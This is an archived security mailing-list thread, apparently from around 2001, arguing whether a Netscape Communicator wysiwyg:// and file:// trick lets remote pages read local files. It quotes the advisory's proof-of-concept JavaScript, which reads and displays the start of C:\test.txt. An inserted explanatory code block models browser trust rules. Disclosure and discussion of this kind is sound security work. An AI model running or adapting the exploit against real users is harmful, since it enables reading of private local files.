It's vastly different. Did you try creating c:\test.txt and putting something in it, and going to that page? Notice that it pops the first line in a dialog box. That means it has that info under programmatic control, and can send it across the network back to the web server, exactly as claimed in the original advisory.

Contrast that with (you) opening your c: drive with Communicator. You can browse local files, but only you get to see the contents, and that window isn't under any kind of programmatic control from other windows... at least that's how it's supposed to work.

It's similar to the Java sandbox concept. Local and signed content are "trusted" and can do whatever they like, whereas remotely loaded content are "untrusted" and aren't supposed to be able to perform certain operations. When you (well, Netscape and Microsoft) try to mix the two, invariably mistakes will be made, and leaks will happen between the two.

Ryan

Hi - this appears to be no different than typing c:\ in the location of any browser. Hardly a security hole, in my opinion. The test site did not prove that this is a potential or current problem.

Bill

>Demonstration is available at:
>http://www.geocities.com/ResearchTriangle/1711/b6.html
>
>The Javascript code is:
>
>sl=window.open("wysiwyg://1/file:///C|/");
>sl2=sl.window.open();
>sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your
>file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new
>java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) &&
>(i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";
>
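
The trusted/untrusted separation discussed in the reply above, as an added example that is not part of the original thread and not Netscape's code: a simplified model in which a window counts as trusted only if its content is local and every window that scripted it is trusted too. The window records, the `setBy` field and the host `remote.example` are assumptions made for this illustration.

```javascript
// Added illustration: a simplified trust model, not Netscape's implementation.
const LOCAL_SCHEMES = new Set(["file:"]);
const INHERITING_SCHEMES = new Set(["javascript:", "about:"]);

// Strip wrapper schemes of the form wysiwyg://<n>/<inner-url>
// (the form that appears in the advisory) down to the inner URL.
function innerUrl(url) {
  const m = /^wysiwyg:\/\/\d+\/(.*)$/i.exec(url);
  return m ? innerUrl(m[1]) : url;
}

function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.-]*:)/i.exec(innerUrl(url));
  return m ? m[1].toLowerCase() : "";
}

// A window record is { url, setBy } (hypothetical shape): setBy is the window
// whose script opened it or assigned its location, or null when the user
// navigated there directly.
function isTrusted(win) {
  const scheme = schemeOf(win.url);
  if (scheme === "" || INHERITING_SCHEMES.has(scheme)) {
    // Script URLs and blank windows carry no content of their own, so they
    // are exactly as trusted as the window that supplied them.
    return win.setBy !== null && isTrusted(win.setBy);
  }
  // Local content stays trusted only if nothing untrusted is scripting it.
  const setterTrusted = win.setBy === null || isTrusted(win.setBy);
  return LOCAL_SCHEMES.has(scheme) && setterTrusted;
}

// Constructed sample windows mirroring the two cases argued in the thread.
const userTyped  = { url: "file:///C|/", setBy: null };              // user types c:\ 
const remotePage = { url: "http://remote.example/b6.html", setBy: null };
const sl         = { url: "wysiwyg://1/file:///C|/", setBy: remotePage };
// The third window, attributed either to the remote page or to sl:
const sl2Remote  = { url: "javascript:alert(1)", setBy: remotePage };
const sl2ViaSl   = { url: "javascript:alert(1)", setBy: sl };

const results = [userTyped, remotePage, sl, sl2Remote, sl2ViaSl].map(isTrusted);
console.log(results); // only the user-typed window is trusted
```

Under this rule it does not matter whether the third window is attributed to the remote page or to the local listing it opened: the remote page is in the chain either way, so file access is refused.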
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:24:11 PDT